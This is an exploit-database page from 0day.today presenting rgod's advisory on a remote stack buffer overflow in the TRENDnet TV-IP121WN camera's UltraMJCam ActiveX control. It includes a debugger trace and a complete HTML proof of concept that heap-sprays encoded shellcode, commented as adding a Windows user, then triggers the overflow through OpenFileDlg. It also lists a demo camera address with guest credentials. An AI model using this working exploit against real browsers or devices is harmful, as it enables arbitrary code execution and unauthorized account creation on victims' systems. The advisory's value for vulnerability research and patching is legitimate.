0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam

Author

rgod

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
 
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
 
 
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
 
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
 
 
Vulnerability:
This ActiveX control exposed the vulnerable
OpenFileDlg() method, see typelib:
 
...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
        /* VT_BSTR [8] [in] */ $sFilter
        )
{
        /* method OpenFileDlg */
}
...
 
By invoking this method with an overlong argument is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:
 
 
Call stack of main thread
Address    Stack      Procedure / arguments                                                                                                                   Called from                   Frame
001279FC   77E6F20B   kernel32.77E637DE                                                                                                                       kernel32.77E6F206             00127A0C
00127A10   0299F958   kernel32.WideCharToMultiByte                                                                                                            UltraMJC.0299F952             00127A0C
00127A14   00000003     CodePage = 3
00127A18   00000000     Options = 0
00127A1C   03835C5C     WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20   FFFFFFFF     WideCharCount = FFFFFFFF (-1.)
00127A24   00127A50     MultiByteStr = 00127A50
00127A28   00007532     MultiByteCount = 7532 (30002.)
00127A2C   00000000     pDefaultChar = NULL
00127A30   00000000     pDefaultCharUsed = NULL
00127A3C   029B11D0   UltraMJC.0299F920                                                                                                                       UltraMJC.029B11CB             00127A38
 
 
...
0299F934   8B45 08          mov eax,dword ptr ss:[ebp+8]
0299F937   C600 00          mov byte ptr ds:[eax],0
0299F93A   6A 00            push 0
0299F93C   6A 00            push 0
0299F93E   8B4D 10          mov ecx,dword ptr ss:[ebp+10]
0299F941   51               push ecx
0299F942   8B55 08          mov edx,dword ptr ss:[ebp+8]
0299F945   52               push edx
0299F946   6A FF            push -1
0299F948   8B45 0C          mov eax,dword ptr ss:[ebp+C]
0299F94B   50               push eax
0299F94C   6A 00            push 0
0299F94E   8B4D 14          mov ecx,dword ptr ss:[ebp+14]
0299F951   51               push ecx
0299F952   FF15 20319F02    call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...
 
The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.
  
As attachment, basic proof of concept code.
 
 
 
<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc
IE7-nodep
 
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
 
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
 x = x + "&";
}
obj.OpenFileDlg(x);
</script>



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam

Report Error

Report Error